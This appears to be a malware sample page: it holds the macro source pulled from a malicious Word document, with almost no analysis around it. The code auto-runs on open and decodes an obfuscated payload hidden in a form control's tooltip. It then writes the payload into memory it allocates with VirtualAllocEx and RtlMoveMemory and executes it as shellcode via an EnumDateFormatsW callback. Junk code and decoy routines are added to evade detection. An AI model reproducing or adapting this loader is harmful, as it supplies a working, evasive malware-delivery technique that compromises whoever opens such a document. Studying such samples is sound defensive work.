Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim eundum As Variant
Dim aristolochia As Integer
ampereturn = "backbiter"
blowpipe = "trebucket"
geld
For gallirallus = 0 To 62
hoenir = 62
singleleaf = "acadia"
sexagesimal = UCase$("pI") & Left("cumnmuezzin", 4) & "us"
sexagesimal = Right$("neutralizeepi", 3) & UCase$("PhYLL") & Right$("collisionum", 2)
Next gallirallus
End Sub
Sub CreateMemo()
    Dim myArray()
    Dim wdBkmk As String
    
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    myArray = Array("To", "CC", "From", "Subject", "Chart")
    Set wdApp = GetObject(, "Word.Application")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(0)).Range
    wdRng.InsertBefore ("B")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(1)).Range
    wdRng.InsertBefore ("T")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(2)).Range
    wdRng.InsertBefore ("M")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(3)).Range
    wdRng.InsertBefore ("F")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(4)).Range
    ActiveSheet.ChartObjects("Chart 1").Copy
    wdRng.PasteAndFormat Type:=wdPasteOLEObject
    
    wdApp.Activate
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub

Function enterprisingly(shallot)
Dim mullein As Byte
Dim ankylosis As Integer
Dim envenomed As Long
tho envenomed, ByVal VarPtr(shallot) + 8, 4
Dim indeterminably As Variant
Dim grocery As Variant
Dim noscitur As Long
respicere = 0
myalgia = 62 - 70 + 7
lutra = 0
baize = kidding \ 211

baize = enlarged / 229

arrastra = 16 + 116 + 3964
scalene = geopolitics(ByVal myalgia, lutra, 7390, arrastra, 64)
baize = drivein + 363

tho noscitur, ByVal VarPtr(scalene) + 8, 4
singleleaf = singleleaf

tho ByVal noscitur, ByVal envenomed, 5538
arrant = 79
adversative = 71
If arrant + adversative < 29 Then
arrant = LCase$("BOmb") & "astica" & LCase$("lLY")
singleleaf = "frankfort"
forgather = LCase$("eN") & Left("grossedhamal", 7)
Else
enlarged = enlarged And 68
adversative = 16
End If

enterprisingly = noscitur
End Function
Sub geld()
Dim autumal As Variant
Dim anorexic As String
bara = copiousness.enlargement.indweller.Page2.stated.ControlTipText
anesthesiologist = 7368
desperate = Right(bara, anesthesiologist)
corkscreq = appeal.lip(desperate)
For dynamically = 30 To 52
blowing = 52
singleleaf = "lincoln"
shavian = Right$("queenlyro", 2) & Left("adwoextraordinariness", 4) & LCase$("RtHY")
shavian = LCase$("Sche") & "matically"
Next dynamically

stabile = "counterclaim"
#If VBA6 And Win64 Then
Dim demigration As Variant
Dim wreathy As columnea
Dim cum As LongPtr
wreathy.elseifstatement = 0
Dim kinesis As Integer
#Else
Dim basilican As Integer
wreathy = 0
Dim incentive As Byte
Dim cum As Long
#End If
leafy = 37 - 64 + 27
crosscheck = "cyprinus"
regeneration = 4096
For birdseye = 47 To 60
diffusion = 60
drivein = baize \ 251
sentimentality = Mid("chuckaluckaniabatjour", 11, 3) & Left("matisslouchily", 5) & LCase$("TIC")
sentimentality = Mid("unscrupulousnessrefairground", 17, 2) & Left("vivicratite", 5) & Mid("acetamideationuntie", 10, 5)
Next birdseye

bucolic = "sinistrous"
catskills = "tuberales"
philhellene = Left("inbiter", 2) & UCase$("qUiSitoRiaL")
principally = 3
While principally < 8
principally = principally + 1
singleleaf = singleleaf
Wend

pastime = corkscreq
homebuilder = "morus"
cydonia = "fringed"
cum = enterprisingly(pastime)
bedspring = "modem"
#If VBA6 And Win64 Then
Dim bouillon As Variant
lachrymae = "synecdoche"
adding = "meralgia"
masai = 107 + 55 - 10 + 1128
#ElseIf (Win32) Then
teacher = "obsequiously"
ornithology = "kaon"
factotum = 114 + 87 + 305
masai = factotum + 3171

#End If
Dim nornal As Byte
Dim bailment As Long
Dim accomplished As Long
accomplished = 0
Dim eyeless As Long
eyeless = cum + masai
bougie = roar(eyeless, accomplished, accomplished)
cecropia = 58
margrave = 68
If cecropia + margrave < 29 Then
cecropia = Left("bepentecost", 2) & Mid("correspondingetletriceps", 14, 4)
singleleaf = certificated
modelled = Right$("reaffiliational", 2) & UCase$("vEoL") & UCase$("ITiS")
Else
singleleaf = "abstergent"
margrave = 26
End If

End Sub


Attribute VB_Name = "appeal"
'I can't watch things further complicate
#If VBA6 And Win64 Then
'I'd like to think there's more something more
Public Type columnea
'I can't watch things further complicate
elseifstatement As LongPtr
'as soon as I escape there's more stagnant bullsshit
End Type
'I'm lost in this place it's such a waste
Public  Declare PtrSafe Function geopolitics Lib "kernel32" Alias "VirtualAllocEx" (smelt As LongPtr, ByVal diffluent As LongPtr, ByVal bourbon As LongPtr, ByVal customfall As LongPtr, ByVal noncompliance As LongPtr) As LongPtr
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function consortship Lib "user32" Alias "EndPaint" (cruelty As LongPtr,abito As LongPtr) As LongPtr
'I hope that I don't bore you while I whine about it
Public Declare PtrSafe Function verre Lib "kernel32" Alias "Sleep" (bucharest As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function carabineer Lib "user32" Alias "GetUpdateRect" (crossexamine As LongPtr, liftoff As LongPtr,auburn As LongPtr) As Boolean
'I hope that I don't bore you while I whine about it
Public Declare PtrSafe Function doublespeak Lib "user32" Alias "SetParent" (ByVal chimneystack As LongPtr, ByVal lasciate As LongPtr,comes As LongPtr) As LongPtr
'I hope you won't be saddened while I cry about it
Public  Declare PtrSafe Function roar Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal flags As Any, ByVal lParam As Any) As LongPtr
'I hope you won't be saddened while I cry about it
Public  Declare PtrSafe Sub tho Lib "ntdll.dll" Alias "RtlMoveMemory" (descriptive As Any, attache As Any, ByVal manfulness As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function salvelinus Lib "user32" Alias "OpenClipboard" (monstrously As LongPtr) As Boolean
'Everyday I wake up to stagnant bullshit

'I can't take another complication
#Else
'I can't take another complication
Public Declare Function frizzly Lib "user32" Alias "EndPaint" (honeybee As Long, flapping As Long) As Long
'I can't take another complication
Public Declare Function cauterizer Lib "user32" Alias "GetUpdateRect" (sandlot As Long, lopholatilus As Long, inhabiting As Long) As Boolean
'I can't take another complication
Public Declare Sub tho Lib "ntdll.dll" Alias "RtlMoveMemory" (impeccable As Any, facinus As Any, ByVal daubentonia As Long)
'I can't take another complication
Public Declare Function shoe Lib "user32" Alias "SetParent" (ByVal abuser As Long, ByVal unexcitingly As Long, fossiliferous As Long) As Long
'I can't take another complication
Public Declare Function geopolitics Lib "kernel32" Alias "VirtualAllocEx" (ceruse As Long, ByVal durables As Long, ByVal ornithogalum As Long, ByVal arthralgic As Long, ByVal hock As Long) As Long
'I can't take another complication
Public Declare Function atlas Lib "user32" Alias "OpenClipboard" (newsworthiness As Long) As Boolean
'as soon as I escape there's more stagnant bullsshit
Public Declare Function diol Lib "kernel32" Alias "Sleep" (dubiety As Long)
'Everyday I wake up to stagnant bullshit
Public Declare Function roar Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal studied As Any, ByVal lParam As Any) As Long
'Everyday I wake up to stagnant bullshit

'I can't watch things further complicate
#End If
'as soon as I escape there's more stagnant bullsshit
Function disregarded(potence, selfglorification)
disregarded = potence * selfglorification
End Function
Function backward(austereness, rondo)
backward = austereness And rondo
End Function
Function applique(acropolis, bankruptcy)
applique = acropolis \ bankruptcy
End Function
Sub selectr()
    Dim curSel
    With Documents("yourDocument.doc")
        If Selection.Type <> wdSelectionIP Then
            Set curSel = Selection.Range
            Selection.Collapse Direction:=wdCollapseStart
        End If
    End With
End Sub

Function lip(bloodstock) As String
Dim cocotte As Integer
baize = kidding And 301

Dim calculator() As Byte
Dim intelligibility(63) As Long
Dim unappeasable As Long
Dim arytenoid As Variant

Dim afterdamp As Long
Dim epitome(63) As Long
Dim illdigested As Variant

certificated = singleleaf

Dim diversification(63) As Long
Dim tollitur(5525) As Byte
Dim earned As Long
Dim asymptoptic As String
Dim down(255) As Byte
Dim madrigalist As Long
Dim living As Variant

Dim tiffin As Byte

shagginess = 31 + 225
development = 255
lapidescence = 63
acuity = 122 - 30 - 121 + 4125
aborticide = 127 + 32 + 10 + 65367
Dim deepread As Variant

Dim nonagenarian As Byte

negligent = 68 + 13 + 257967
frightful = 16515072
chorizagrotis = 78 + 16711602
fissipedia = 6 + 58
bullshit = 65280
bacterially = 86 - 18 + 262076
pediculus = 86 + 3946
Dim barring As Integer
Dim musales(7367) As Byte
coursing = 123 + 7245
For osteomalacia = 1 To coursing
vivacious = Mid(bloodstock, osteomalacia, 1)
parsimonia = "derivable"
trichomoniasis = "heavyduty"
cystic = (Asc(vivacious))
musales(osteomalacia - 1) = cystic
Next
Dim prohibition As String
For nondescript = 46 To 63
attainment = 63
certificated = "capacity"
counterfire = UCase$("ke") & Mid("araliaceaerchithieve", 11, 4) & Mid("codefpiqueerer", 4, 2)
counterfire = Right$("ruledde", 2) & UCase$("INON") & UCase$("YchUs")
Next nondescript

downbow = 7367
veloute = 40 + 54 + 97 - 156
For dipstick = 0 To downbow
musales(dipstick) = musales(dipstick) + 4
Next dipstick
concede = 98
glitz = 59
If concede + glitz < 21 Then
concede = Left("taugreenling", 3) & Left("tophobaste", 5) & Right$("stolenny", 2)
certificated = "activation"
bayonets = LCase$("Ch") & LCase$("OKra")
Else
singleleaf = "brahminic"
glitz = 35
End If

cocotte = 0
charmingly = 27 + 95
amplifier = 48 + 207
For unappeasable = 0 To amplifier
Select Case unappeasable
Case 65 To 90
down(unappeasable) = unappeasable - 65
Case 97 To charmingly
down(unappeasable) = unappeasable - 71
Case 48 To 57
down(unappeasable) = unappeasable + 4
Case 43
down(unappeasable) = 62
Case 47
down(unappeasable) = 63
End Select
Next unappeasable
For unappeasable = 0 To 63
diversification(unappeasable) = disregarded(unappeasable, fissipedia)
epitome(unappeasable) = disregarded(unappeasable, acuity)
intelligibility(unappeasable) = disregarded(unappeasable, bacterially)
Next unappeasable
feint = 8
While feint < 13
feint = feint + 1
certificated = singleleaf
Wend

calculator = musales
dockage = 4
aetas = 74
clotted = 98
If aetas + clotted < 2 Then
aetas = LCase$("Me") & UCase$("nS")
singleleaf = "bawdy"
unobtrusive = "re" & Right$("contradictorinessgle", 3)
Else
drivein = drivein / 397
clotted = 8
End If

pericarp = 3
singleleaf = certificated

kidding = baize \ 180

connivance = pericarp + 1
capriciously = 2
For madrigalist = 0 To downbow
puzzled = calculator(madrigalist)
earned = intelligibility(down(puzzled)) _
 + epitome(down(calculator(madrigalist + 1))) + diversification(down(calculator(madrigalist + 2))) + down(calculator(madrigalist + pericarp))
unappeasable = backward(earned, chorizagrotis)
tollitur(afterdamp) = applique(unappeasable, aborticide)
unappeasable = backward(earned, bullshit)
tollitur(afterdamp + 1) = applique(unappeasable, shagginess)
tollitur(afterdamp + capriciously) = backward(earned, development)
afterdamp = afterdamp + capriciously + 1
madrigalist = madrigalist + 3
Next
lip = tollitur
End Function



Attribute VB_Name = "copiousness"
Attribute VB_Base = "0{AC0BA472-0526-4C40-83DF-336D49B39BE4}{BD989CD1-9E0C-4637-903B-7C18A7049B57}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False